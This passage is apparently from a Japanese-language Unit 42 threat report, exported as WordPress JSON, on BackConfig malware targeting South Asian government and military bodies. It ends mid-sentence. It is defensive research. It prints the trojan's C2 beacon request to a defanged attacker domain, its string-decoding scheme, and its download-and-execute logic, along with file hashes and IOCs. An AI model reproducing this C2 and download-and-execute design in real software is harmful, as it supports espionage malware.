{"id":107263,"date":"2020-05-14T23:40:12","date_gmt":"2020-05-15T06:40:12","guid":{"rendered":"https:\/\/unit42.paloaltonetworks.com\/?p=107263"},"modified":"2020-05-14T23:41:33","modified_gmt":"2020-05-15T06:41:33","slug":"updated-backconfig-malware-targeting-government-and-military-organizations","status":"publish","type":"post","link":"https:\/\/unit42.paloaltonetworks.com\/ja\/updated-backconfig-malware-targeting-government-and-military-organizations\/","title":{"rendered":"\u5357\u30a2\u30b8\u30a2\u306e\u653f\u5e9c\u6a5f\u95a2\u3068\u8ecd\u4e8b\u65bd\u8a2d\u3092\u6a19\u7684\u3068\u3059\u308b\u3001\u66f4\u65b0\u3055\u308c\u305fBackConfig\u30de\u30eb\u30a6\u30a7\u30a2"},"content":{"rendered":"<h2>\u6982\u8981<\/h2>\n<p>Unit 42\u306f\u3001Hangover\u8105\u5a01\u30b0\u30eb\u30fc\u30d7(\u5225\u540d\u3001Neon\u3001Viceroy Tiger\u3001MONSOON)\u304c\u4f7f\u7528\u3059\u308b<a href=\"https:\/\/ti.360.net\/blog\/articles\/donot-group-is-targeting-pakistani-businessman-working-in-china-en\/\">BackConfig<\/a>\u30de\u30eb\u30a6\u30a7\u30a2\u306b\u95a2\u9023\u3059\u308b\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3092\u3001\u904e\u53bb4\u304b\u6708\u9593\u306b\u308f\u305f\u3063\u3066\u89b3\u5bdf\u3057\u307e\u3057\u305f\u3002\u73fe\u5730\u306e\u6642\u4e8b\u554f\u984c\u3092\u30eb\u30a2\u30fc\u3068\u3057\u3066\u4f7f\u7528\u3059\u308b\u3053\u306e\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u653b\u6483\u306e\u6a19\u7684\u306b\u306f\u3001\u5357\u30a2\u30b8\u30a2\u306e\u653f\u5e9c\u6a5f\u95a2\u3084\u8ecd\u4e8b\u65bd\u8a2d\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3057\u305f\u3002<\/p>\n<p>\u30ab\u30b9\u30bf\u30de\u30a4\u30ba\u3055\u308c\u305f\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u3067\u3042\u308bBackConfig\u306f\u3001\u30b7\u30b9\u30c6\u30e0\u60c5\u5831\u3084\u30ad\u30fc\u30ed\u30ae\u30f3\u30b0\u60c5\u5831\u3092\u53ce\u96c6\u3059\u308b\u6a5f\u80fd\u3001\u4ed6\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3057\u3066\u5b9f\u884c\u3059\u308b\u6a5f\u80fd\u306a\u3069\u3001\u3055\u307e\u3056\u307e\u306a\u6a5f\u80fd\u3092\u63d0\u4f9b\u3059\u308b\u30b3\u30f3\u30dd\u30fc\u30cd\u30f3\u30c8\u3092\u4f7f\u7528\u3067\u304d\u308b\u3001\u67d4\u8edf\u306a\u30d7\u30e9\u30b0\u30a4\u30f3\u30a2\u30fc\u30ad\u30c6\u30af\u30c1\u30e3\u3092\u5099\u3048\u3066\u3044\u307e\u3059\u3002<\/p>\n<p>\u6700\u521d\u306e\u611f\u67d3\u306f\u3001\u4fb5\u5bb3\u3055\u308c\u305f\u6b63\u5f53\u306aWeb\u30b5\u30a4\u30c8\u304b\u3089\u5175\u5668\u5316\u3055\u308c\u305fMicrosoft Excel (XLS)\u6587\u66f8\u304c\u914d\u4fe1\u3055\u308c\u308b\u3053\u3068\u3067\u767a\u751f\u3057\u307e\u3059\u3002\u3053\u306eWeb\u30b5\u30a4\u30c8\u306eURL\u306f\u3001\u591a\u304f\u306e\u5834\u5408\u3001\u96fb\u5b50\u30e1\u30fc\u30eb\u3067\u4f1d\u3048\u3089\u308c\u307e\u3059\u3002\u3053\u306e\u6587\u66f8\u306f\u3001Visual Basic for Applications (VBA)\u306e\u30de\u30af\u30ed\u30b3\u30fc\u30c9\u3092\u4f7f\u7528\u3057\u307e\u3059\u3002\u88ab\u5bb3\u7aef\u672b\u3067\u30de\u30af\u30ed\u304c\u6709\u52b9\u306a\u5834\u5408\u3001\u3053\u306e\u30de\u30af\u30ed\u30b3\u30fc\u30c9\u306f\u3001\u8907\u6570\u306e\u30b3\u30f3\u30dd\u30fc\u30cd\u30f3\u30c8\u3067\u69cb\u6210\u3055\u308c\u308b\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u30d7\u30ed\u30bb\u30b9\u3092\u958b\u59cb\u3057\u3066\u3001\u30d7\u30e9\u30b0\u30a4\u30f3 \u30ed\u30fc\u30c0\u30fc \u30da\u30a4\u30ed\u30fc\u30c9\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u3066\u5b9f\u884c\u3057\u307e\u3059\u3002\u30e2\u30b8\u30e5\u30fc\u30eb\u65b9\u5f0f\u306e\u5834\u5408\u3001\u78ba\u5b9f\u306b\u500b\u3005\u306e\u30b3\u30f3\u30dd\u30fc\u30cd\u30f3\u30c8\u306e\u5909\u66f4\u306b\u304b\u304b\u308b\u6642\u9593\u304c\u77ed\u7e2e\u3055\u308c\u307e\u3059\u3002\u3055\u3089\u306b\u3001\u653b\u6483\u8005\u306b\u3068\u3063\u3066\u3088\u308a\u91cd\u8981\u306a\u3053\u3068\u3068\u3057\u3066\u3001\u7279\u306b\u30b3\u30f3\u30dd\u30fc\u30cd\u30f3\u30c8\u3092\u5206\u96e2\u3057\u3066\u5206\u6790\u3059\u308b\u969b\u306b\u30b5\u30f3\u30c9\u30dc\u30c3\u30af\u30b9\u3084\u52d5\u7684\u5206\u6790\u306e\u30b7\u30b9\u30c6\u30e0\u3092\u59a8\u5bb3\u3067\u304d\u308b\u65b9\u6cd5\u3067\u3001\u60aa\u610f\u306e\u3042\u308b\u52d5\u4f5c\u304c\u5206\u5272\u3055\u308c\u307e\u3059\u3002<\/p>\n<p><a href=\"https:\/\/www.paloaltonetworks.com\/products\/secure-the-network\/wildfire\">WildFire<\/a>\u3092\u5099\u3048\u305f\u5f0a\u793e\u306e<a href=\"https:\/\/www.paloaltonetworks.com\/products\/secure-the-network\/subscriptions\/threat-prevention\">\u8105\u5a01\u9632\u5fa1<\/a>\u30d7\u30e9\u30c3\u30c8\u30d5\u30a9\u30fc\u30e0\u306f\u3001\u3053\u306e\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u306b\u95a2\u9023\u3059\u308b\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3092\u691c\u51fa\u3059\u308b\u3068\u540c\u6642\u306b\u3001\u8b58\u5225\u3055\u308c\u305f\u60aa\u610f\u306e\u3042\u308b\u30c9\u30e1\u30a4\u30f3\u3084\u4fb5\u5bb3\u3055\u308c\u305f\u30c9\u30e1\u30a4\u30f3\u306b\u3064\u3044\u3066\u3001PAN-DB <a href=\"https:\/\/www.paloaltonetworks.com\/products\/threat-detection-and-prevention\/web-security\">URL\u30d5\u30a3\u30eb\u30bf\u30ea\u30f3\u30b0<\/a>\u30bd\u30ea\u30e5\u30fc\u30b7\u30e7\u30f3\u5185\u3067\u300c\u30de\u30eb\u30a6\u30a7\u30a2\u300d\u30ab\u30c6\u30b4\u30ea\u3092\u66f4\u65b0\u3057\u307e\u3059\u3002<\/p>\n<p>\u3053\u306e\u8abf\u67fb\u306b\u95a2\u9023\u3059\u308bIOC\u306f\u3001\u3053\u306e\u30ec\u30dd\u30fc\u30c8\u306e\u6700\u5f8c\u306b\u8a18\u8f09\u3059\u308b\u307b\u304b\u3001<a href=\"https:\/\/pan-unit42.github.io\/playbook_viewer\/?pb=hangover\">Unit 42\u306ePlaybook Viewer<\/a>\u304b\u3089\u30a2\u30af\u30bb\u30b9\u3067\u304d\u308b\u300eAdversary Playbook (\u653b\u6483\u8005\u306e\u30d7\u30ec\u30a4\u30d6\u30c3\u30af)\u300f\u306eHangover\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u306e\u9805\u76ee\u306b\u3082\u8a18\u8f09\u3057\u307e\u3059\u3002<\/p>\n<h3>\u51fa\u767a\u70b9<\/h3>\n<p>Unit 42\u304cWindows PE\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb(SHA256: 84e56294b260b9024917c390be21121e927f414965a7a9db7ed7603e29b0d69c)\u306b\u95a2\u9023\u3059\u308b\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3092\u6700\u521d\u306b\u78ba\u8a8d\u3057\u305f\u306e\u306f\u3001\u6ce8\u76ee\u3057\u3066\u3044\u305f\u7279\u5b9a\u306e\u5206\u91ce\u3068\u56fd\u306b\u95a2\u9023\u3059\u308bAutoFocus\u30c7\u30fc\u30bf\u3092\u691c\u7d22\u3057\u3066\u3044\u308b\u3068\u304d\u3067\u3057\u305f\u3002<\/p>\n<p>\u3053\u306e\u30d5\u30a1\u30a4\u30eb\u3092\u6700\u521d\u306b\u78ba\u8a8d\u3057\u305f\u306e\u306f2020\u5e741\u670819\u65e5\u3067\u3059\u304c\u3001\u308f\u305a\u304b\u6570\u5206\u306e\u9593\u306b2\u3064\u306e\u7d44\u7e54\u3001\u3059\u306a\u308f\u3061\u3042\u308b\u56fd\u306e\u653f\u5e9c\u6a5f\u95a2\u3068\u5225\u306e\u56fd\u306e\u8ecd\u4e8b\u65bd\u8a2d\u306b\u3088\u3063\u3066\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3055\u308c\u307e\u3057\u305f\u3002\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u5143\u306f\u3001http:\/\/212.114.52[.]148\/request\/httpsrequest\u3067\u3042\u308a\u3001httpsrequest\u30d5\u30a1\u30a4\u30eb\u306fdphc.exe\u3068\u3057\u3066\u30ed\u30fc\u30ab\u30eb\u306b\u4fdd\u5b58\u3055\u308c\u3066\u3044\u307e\u3057\u305f\u3002\u3053\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u914d\u4fe1\u65b9\u6cd5\u306e\u8a73\u7d30\u306b\u3064\u3044\u3066\u306f\u3001\u672c\u7a3f\u5f8c\u534a\u3067\u8aac\u660e\u3057\u307e\u3059\u3002<\/p>\n<p>\u3053\u306e\u3068\u304d\u306e(\u4ed6\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306e\u5834\u5408\u306b\u3064\u3044\u3066\u306f\u5f8c\u8ff0) BackConfig\u30de\u30eb\u30a6\u30a7\u30a2\u3092\u914d\u4fe1\u3059\u308b\u969b\u306eURL\u30d1\u30b9\u3084\u30d5\u30a1\u30a4\u30eb\u540d\u306b\u9078\u629e\u3055\u308c\u305f\u7528\u8a9e\u306f\u3001\u660e\u3089\u304b\u306b\u7121\u5bb3\u3067\u3042\u308b\u3053\u3068\u3092\u601d\u308f\u305b\u308b\u30aa\u30da\u30ec\u30fc\u30b7\u30e7\u30f3\u3001\u30d1\u30b9\u3001\u30d5\u30a1\u30a4\u30eb\u540d\u306b\u306a\u3063\u3066\u304a\u308a\u3001\u30b9\u30da\u30eb\u3053\u305d\u7570\u306a\u308b\u3082\u306e\u306e\u3001\u540c\u30da\u30a4\u30ed\u30fc\u30c9\u304cDHCP\u30cd\u30c3\u30c8\u30ef\u30fc\u30ad\u30f3\u30b0\u30b5\u30fc\u30d3\u30b9\u95a2\u9023\u3067\u3042\u308b\u304b\u306e\u3088\u3046\u306b\u898b\u305b\u304b\u3051\u3066\u3044\u307e\u3059\u3002<\/p>\n<p>\u3053\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u76ee\u7684\u306f\u3001\u653b\u6483\u8005\u304c\u3001\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u3066\u5b9f\u884c\u3067\u304d\u308b\u3088\u3046\u306b\u3059\u308b\u3053\u3068\u3001\u30a8\u30f3\u30c9\u30dd\u30a4\u30f3\u30c8 \u30b7\u30b9\u30c6\u30e0\u4e0a\u3067\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3059\u308b\u30d0\u30c3\u30c1\u30d5\u30a1\u30a4\u30eb\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u3066\u5b9f\u884c\u3067\u304d\u308b\u3088\u3046\u306b\u3059\u308b\u3053\u3068\u3067\u3059\u3002<\/p>\n<p>\u3053\u306e\u30b5\u30f3\u30d7\u30eb\u306b\u306f\u3001\u5404\u6587\u5b57\u304b\u30896\u3092\u6e1b\u7b97\u3057\u3066\u300c\u5fa9\u53f7\u300d\u3059\u308b\u30ab\u30b9\u30bf\u30e0\u30eb\u30fc\u30c1\u30f3\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u3053\u306e\u65b9\u6cd5\u3067\u5fa9\u53f7\u3057\u305f\u6587\u5b57\u5217\u3092\u4ee5\u4e0b\u306b\u793a\u3057\u307e\u3059\u3002<\/p>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">linkrequest[.]live<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">\\\\Adobe\\\\Driver\\\\dwg\\\\pid.txt<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">\\\\Adobe\\\\Driver\\\\dwg\\\\<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">\\\\Adobe\\\\Driver\\\\dwg\\\\wuaupdt.exe<\/span><\/li>\n<\/ul>\n<p>\u3053\u306e\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u306f\u3001\u4ee5\u4e0b\u306e\u30d5\u30a1\u30a4\u30eb\u3092\u8aad\u307f\u8fbc\u3093\u3067\u3001C2\u30d3\u30fc\u30b3\u30f3\u306eURL\u3067\u4f7f\u7528\u3057\u307e\u3059\u3002\u3053\u306e\u30d5\u30a1\u30a4\u30eb\u304c\u5b58\u5728\u3057\u306a\u3044\u5834\u5408\u3001\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u306f\u305d\u308c\u4ee5\u4e0a\u4f55\u3082\u3057\u306a\u3044\u3067\u7d42\u4e86\u3057\u307e\u3059\u3002pid.txt\u30d5\u30a1\u30a4\u30eb\u306f\u3001\u5175\u5668\u5316\u3055\u308c\u305fExcel\u6587\u66f8\u3067\u958b\u59cb\u3055\u308c\u308b\u521d\u671f\u306e\u914d\u4fe1\u3068\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u306e\u6bb5\u968e\u3067\u4f5c\u6210\u3055\u308c\u307e\u3059\u3002\u3053\u306e\u30bb\u30c3\u30c8\u30a2\u30c3\u30d7\u30d7\u30ed\u30bb\u30b9\u306e\u8a73\u7d30\u306b\u3064\u3044\u3066\u306f\u3001\u5f8c\u8ff0\u3059\u308b\u914d\u4fe1\u30bb\u30af\u30b7\u30e7\u30f3\u3067\u8aac\u660e\u3057\u307e\u3059\u3002\u524d\u8ff0\u3057\u305f\u3088\u3046\u306b\u3001\u3053\u306e\u52d5\u4f5c\u306b\u3088\u3063\u3066\u3001\u500b\u3005\u306e\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u30b3\u30f3\u30dd\u30fc\u30cd\u30f3\u30c8\u306e\u81ea\u52d5\u5206\u6790\u304c\u56f0\u96e3\u306b\u306a\u308a\u307e\u3059\u3002<\/p>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">%USERPROFILE%\\Adobe\\Driver\\dwg\\pid.txt<\/span><\/li>\n<\/ul>\n<p>HttpOpenRequestA\u95a2\u6570\u3092\u547c\u3073\u51fa\u3059\u969b\u306bINTERNET_FLAG_SECURE\u30d5\u30e9\u30b0\u3092\u4f7f\u7528\u3059\u308b\u3053\u3068\u3067\u3001C2\u30c1\u30e3\u30cd\u30eb\u306fHTTPS\u3092\u4f7f\u7528\u3057\u307e\u3059\u3002\u30d3\u30fc\u30b3\u30f3\u306eHTTP\u30ea\u30af\u30a8\u30b9\u30c8\u306f\u3001\u4ee5\u4e0b\u306e\u3088\u3046\u306b\u306a\u308a\u307e\u3059\u3002<\/p>\n<p style=\"padding-left: 40px;\"><span style=\"font-family: 'courier new', courier, monospace;\">GET \/orderme\/<strong>[contents of pid.txt file]<\/strong> HTTP\/1.1<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">User-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\/20100101 Firefox\/52.0 @\/NEW<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">Host: linkrequest[.]live <strong>[resolving to 23.106.123[.]87]<\/strong><\/span><\/p>\n<p>\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u306f\u3001HTTP\u30ec\u30b9\u30dd\u30f3\u30b9\u30d8\u30c3\u30c0\u30fc\u3067\u3001\u4ee5\u4e0b\u306e\u30d5\u30a3\u30fc\u30eb\u30c9\u3068\u5024\u3092\u63a2\u3057\u307e\u3059\u3002<\/p>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">\"Content-Type: application\"<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">\"Content-Type: xDvsds\"<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">\"Content-Type: Bw11eW\"<\/span><\/li>\n<\/ul>\n<p>content-type\u30d5\u30a3\u30fc\u30eb\u30c9\u306e\u5024\u304capplication\u3067\u3042\u308b\u5834\u5408\u3001\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u306f\u3001HTTP\u30ec\u30b9\u30dd\u30f3\u30b9\u30d8\u30c3\u30c0\u30fc\u306e\u6587\u5b57\u5217filename\u3068Content-Transfer-Encoding\u306e\u9593\u304b\u3089\u30d5\u30a1\u30a4\u30eb\u540d\u3092\u62bd\u51fa\u3057\u307e\u3059\u3002\u3053\u306e\u30d5\u30a1\u30a4\u30eb\u540d\u3092\u4f7f\u7528\u3057\u3066\u3001%USERPROFILE%\\Adobe\\Driver\\dwg\\\u30d5\u30a9\u30eb\u30c0\u306b\u30d5\u30a1\u30a4\u30eb\u3092\u4f5c\u6210\u3057\u307e\u3059\u3002\u3053\u306e\u30d5\u30a1\u30a4\u30eb\u306b\u306f\u3001HTTP\u30ec\u30b9\u30dd\u30f3\u30b9\u306e\u30c7\u30fc\u30bf\u3092\u66f8\u304d\u8fbc\u307f\u307e\u3059\u3002\u4ed6\u306e2\u3064\u306eContent-Type\u304b\u3089\u5224\u65ad\u3057\u3066\u3001\u63d0\u4f9b\u3055\u308c\u308b\u540d\u524d\u306f\u300cwuaupdt.exe\u300d\u307e\u305f\u306f\u300ctest.bat\u300d\u3067\u3042\u308b\u3068\u79c1\u305f\u3061\u306f\u78ba\u4fe1\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<p>content-type\u30d5\u30a3\u30fc\u30eb\u30c9\u306e\u5024\u304cxDvsds\u3067\u3042\u308b\u5834\u5408\u3001\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u306f\u3001ShellExecuteA\u3068\u300copen\u300d\u30e1\u30bd\u30c3\u30c9\u3092\u4f7f\u7528\u3057\u3066\u3001\u4ee5\u4e0b\u306e\u30d5\u30a1\u30a4\u30eb\u306e\u5b9f\u884c\u3092\u8a66\u307f\u307e\u3059\u3002<\/p>\n<p style=\"padding-left: 40px;\"><span style=\"font-family: 'courier new', courier, monospace;\">%USERPROFILE%\\Adobe\\Driver\\dwg\\wuaupdt.exe<\/span><\/p>\n<p>content-type\u30d5\u30a3\u30fc\u30eb\u30c9\u306e\u5024\u304cBw11eW\u3067\u3042\u308b\u5834\u5408\u3001\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u306f\u3001ShellExecuteA\u3068\u300copen\u300d\u30e1\u30bd\u30c3\u30c9\u3092\u4f7f\u7528\u3057\u3066\u3001\u4ee5\u4e0b\u306e\u30d5\u30a1\u30a4\u30eb\u306e\u5b9f\u884c\u3092\u8a66\u307f\u307e\u3059\u3002<\/p>\n<p style=\"padding-left: 40px;\"><span style=\"font-family: 'courier new', courier, monospace;\">%USERPROFILE%\\Adobe\\Driver\\dwg\\test.bat<\/span><\/p>\n<p>\u3053\u306e\u30ec\u30dd\u30fc\u30c8\u306e\u57f7\u7b46\u6642\u70b9\u3067\u306fC2\u306f\u64cd\u4f5c\u4e0d\u80fd\u306b\u306a\u3063\u3066\u3044\u308b\u3089\u3057\u304f\u3001\u305d\u308c\u4ee5\u4e0a\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u78ba\u8a8d\u3055\u308c\u307e\u305b\u3093\u3067\u3057\u305f\u3002\u5f0a\u793e\u306f\u3001\u7d50\u679c\u3068\u3057\u3066\u5f97\u3089\u308c\u305fwuaupdt.exe\u30d5\u30a1\u30a4\u30eb\u304c\u3001\u305d\u308c\u4ee5\u964d\u306e\u60c5\u5831\u7a83\u53d6\u6a5f\u80fd\u3084\u30ad\u30fc\u30b9\u30c8\u30ed\u30fc\u30af\u8a18\u9332\u6a5f\u80fd\u3092\u63d0\u4f9b\u3057\u3066\u3044\u308b\u3053\u3068\u3001\u305d\u3057\u3066Qihoo 360\u8105\u5a01\u30a4\u30f3\u30c6\u30ea\u30b8\u30a7\u30f3\u30b9\u30b0\u30eb\u30fc\u30d7\u304c\u904e\u53bb\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306e\u8abf\u67fb\u7d50\u679c(<a href=\"https:\/\/ti.360.net\/blog\/articles\/donot-group-is-targeting-pakistani-businessman-working-in-china-en\/\">\u3053\u3061\u3089\u3092\u53c2\u7167<\/a>)\u3067\u8aac\u660e\u3057\u3066\u3044\u308b\u3088\u3046\u306b\u3001\u4ed6\u306e\u30b3\u30de\u30f3\u30c9\u3092\u81ea\u3089\u5b9f\u884c\u3057\u3066\u3044\u308b\u304b\u3001\u307e\u305f\u306f\u30d7\u30e9\u30b0\u30a4\u30f3\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u3066\u5b9f\u884c\u3055\u305b\u3066\u3044\u308b\u3053\u3068\u3092\u78ba\u4fe1\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<p>Unit 42\u306f\u3001\u591a\u6570\u306eBackConfig\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u306b\u5bfe\u3057\u3066\u5927\u96d1\u628a\u306a\u30d0\u30a4\u30ca\u30ea\u6bd4\u8f03\u3092\u5b9f\u65bd\u3057\u307e\u3057\u305f\u304c\u3001\u91cd\u8907\u3057\u3066\u3044\u308b\u975e\u30e9\u30a4\u30d6\u30e9\u30ea\u95a2\u6570\u306f\u898b\u3064\u304b\u308a\u307e\u305b\u3093\u3067\u3057\u305f\u3002\u3053\u306e\u3053\u3068\u306f\u3001<a href=\"https:\/\/www.netscout.com\/blog\/asert\/donot-team-leverages-new-modular-malware-framework-south-asia\">\u3053\u3061\u3089<\/a>\u3084<a href=\"https:\/\/labs.bitdefender.com\/2017\/09\/ehdevel-the-story-of-a-continuously-improving-advanced-threat-creation-toolkit\/\">\u3053\u3061\u3089<\/a>\u3067\u8aac\u660e\u3055\u308c\u3066\u3044\u308b\u3088\u3046\u306b\u3001\u305d\u308c\u3089\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u304cYTY\u30d5\u30ec\u30fc\u30e0\u30ef\u30fc\u30af\u307e\u305f\u306fEHDev\u30d5\u30ec\u30fc\u30e0\u30ef\u30fc\u30af\u306b\u57fa\u3065\u304f\u3082\u306e\u3067\u3042\u308b\u3053\u3068\u3092\u793a\u5506\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<h3>PE\u30e1\u30bf\u30c7\u30fc\u30bf<\/h3>\n<p>\u30de\u30eb\u30a6\u30a7\u30a2\u30b5\u30f3\u30d7\u30eb\u306b\u306f\u3001\u30ab\u30ea\u30d5\u30a9\u30eb\u30cb\u30a2\u306b\u62e0\u70b9\u3092\u7f6e\u304fFoxit Software\u88fd\u306e\u30bd\u30d5\u30c8\u30a6\u30a7\u30a2\u3092\u88c5\u3046\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u306e\u7f72\u540d\u306b\u4f7f\u7528\u3055\u308c\u308b\u81ea\u5df1\u7f72\u540d\u30c7\u30b8\u30bf\u30eb\u8a3c\u660e\u66f8\u306a\u3069\u3001\u3044\u304f\u3064\u304b\u306e\u8208\u5473\u6df1\u3044\u9759\u7684\u30a2\u30fc\u30c6\u30a3\u30d5\u30a1\u30af\u30c8\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u653b\u6483\u8005\u304c\u3053\u306e\u4f01\u696d\u3084\u88681\u306b\u793a\u3059\u4ed6\u306e\u4f01\u696d\u306b\u6210\u308a\u3059\u307e\u3059\u3053\u3068\u3092\u9078\u629e\u3057\u305f\u7406\u7531\u306f\u4e0d\u660e\u3067\u3059\u304c\u3001\u524d\u8ff0\u3057\u305f\u3088\u3046\u306b\u3001\u30d5\u30a1\u30a4\u30eb\u540d\u3068URL\u306e\u4f7f\u3044\u65b9\u306f\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u304c\u5b89\u5168\u3067\u4fe1\u983c\u3067\u304d\u308b\u3082\u306e\u3067\u3042\u308b\u3088\u3046\u306b\u601d\u308f\u305b\u307e\u3059\u3002<\/p>\n<p>Unit 42\u306f\u3001\u3053\u306e\u30e1\u30bf\u30c7\u30fc\u30bf\u3068\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u306e\u8abf\u67fb\u304b\u3089\u53ce\u96c6\u3057\u305f\u60c5\u5831\u3092\u7d44\u307f\u5408\u308f\u305b\u3066\u3001AutoFocus\u30c7\u30fc\u30bf\u3092\u4e2d\u5fc3\u306b\u8abf\u67fb\u3092\u9032\u3081\u308b\u3053\u3068\u3067\u3001\u3055\u307e\u3056\u307e\u306aBackConfig PE\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u306e\u30b5\u30f3\u30d7\u30eb\u3092\u898b\u3064\u3051\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3057\u305f\u3002\u904e\u53bb12\u304b\u6708\u306b\u53ce\u96c6\u3057\u305f\u30b5\u30f3\u30d7\u30eb\u3092\u4ee5\u4e0b\u306e\u88681\u3068\u88682\u306b\u793a\u3057\u307e\u3059\u3002<\/p>\n<table>\n<tbody>\n<tr>\n<td><strong>SHA256<\/strong><\/td>\n<td><strong>\u30b3\u30f3\u30d1\u30a4\u30eb\u65e5\u6642(UTC)<\/strong><\/td>\n<td><strong>\u521d\u56de\u89b3\u6e2c\u65e5\u6642(<\/strong><strong>\u592a\u5e73\u6d0b\u6642\u9593)<\/strong><\/td>\n<td><strong>\u7f72\u540d\u8005<\/strong><\/td>\n<\/tr>\n<tr>\n<td>84e5629\u2026<\/td>\n<td>01\/20\/2020 7:26:09am<\/td>\n<td>01\/19\/2020 11:49:03pm<\/td>\n<td rowspan=\"2\">Foxit Software Incorporated<\/td>\n<\/tr>\n<tr>\n<td>18ce3ee\u2026<\/td>\n<td>10\/10\/2019 9:22:11am<\/td>\n<td>01\/16\/2020 4:30:26pm<\/td>\n<\/tr>\n<tr>\n<td>4a4bc01\u2026<\/td>\n<td>11\/21\/2019 9:19:49am<\/td>\n<td>01\/16\/2020 1:31:46am<\/td>\n<td rowspan=\"3\">wind0ws<\/td>\n<\/tr>\n<tr>\n<td>91c67c1\u2026<\/td>\n<td>11\/21\/2019 9:19:49am<\/td>\n<td>12\/02\/2019 2:03:41am<\/td>\n<\/tr>\n<tr>\n<td>de5b670\u2026<\/td>\n<td>11\/21\/2019 9:19:49am<\/td>\n<td>11\/21\/2019 11:59:05pm<\/td>\n<\/tr>\n<tr>\n<td>f79ebf0\u2026<\/td>\n<td>10\/28\/2019 5:35:26am<\/td>\n<td>11\/09\/2019 10:32:09pm<\/td>\n<td>NVIDIA Corporation<\/td>\n<\/tr>\n<tr>\n<td>31faeef\u2026<\/td>\n<td>10\/10\/2019 9:22:11am<\/td>\n<td>10\/13\/2019 10:11:04pm<\/td>\n<td>Foxit Software Incorporated<\/td>\n<\/tr>\n<tr>\n<td>d87b875\u2026<\/td>\n<td>09\/12\/2019 5:54:04am<\/td>\n<td>09\/26\/2019 9:32:19am<\/td>\n<td>Digicert Global<\/td>\n<\/tr>\n<tr>\n<td>1510996\u2026<\/td>\n<td>12\/05\/2018 4:35:03am<\/td>\n<td>04\/09\/2019 10:30:16am<\/td>\n<td>Foxit Software Incorporated<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\"><em>\u88681. PE\u30b3\u30f3\u30d1\u30a4\u30eb\u6642\u9593\u3068\u4f7f\u7528\u3055\u308c\u3066\u3044\u308b\u30c7\u30b8\u30bf\u30eb\u7f72\u540d(\u521d\u56de\u89b3\u6e2c\u65e5\u6642\u9806)<\/em><\/span><\/p>\n<p>\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb(SHA256: 